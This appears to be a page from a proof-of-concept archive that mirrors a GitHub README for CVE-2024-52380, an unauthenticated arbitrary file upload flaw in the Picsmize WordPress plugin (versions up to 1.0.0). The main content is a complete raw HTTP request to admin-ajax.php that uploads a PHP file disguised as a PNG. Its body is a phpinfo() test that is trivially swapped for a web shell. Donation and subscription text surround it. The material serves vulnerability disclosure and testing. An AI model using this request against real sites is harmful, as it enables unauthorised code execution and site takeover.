Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-52380 PoC — WordPress Picsmize plugin <= 1.0.0 - Arbitrary File Upload vulnerability

Source
https://github.com/RandomRobbieBF/CVE-2024-52380
Associated Vulnerability
Title:WordPress Picsmize plugin <= 1.0.0 - Arbitrary File Upload vulnerability (CVE-2024-52380)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in softpulseinfotech Picsmize picsmize allows Upload a Web Shell to a Web Server.This issue affects Picsmize: from n/a through <= 1.0.0.
Description
Picsmize <= 1.0.0 - Unauthenticated Arbitrary File Upload
Readme
# CVE-2024-52380
Picsmize &lt;= 1.0.0 - Unauthenticated Arbitrary File Upload

# Description

The Picsmize plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Score: 10.0
Vendors: Softpulse Infotech
Products: Picsmize
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network
```

POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=pics-manual
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------263629263440545280502417734995
Content-Length: 371
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

-----------------------------263629263440545280502417734995
Content-Disposition: form-data; name="images[]"; filename="t.php"
Content-Type: image/png

<?php phpinfo(); ?>
-----------------------------263629263440545280502417734995
Content-Disposition: form-data; name="action"

PicsUploadManualFile
-----------------------------263629263440545280502417734995--
```
File Snapshot

 [4.0K]  /data/pocs/e8d3018d3bb88a3463e527f61e0d41e4b6106cc4
└── [1.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →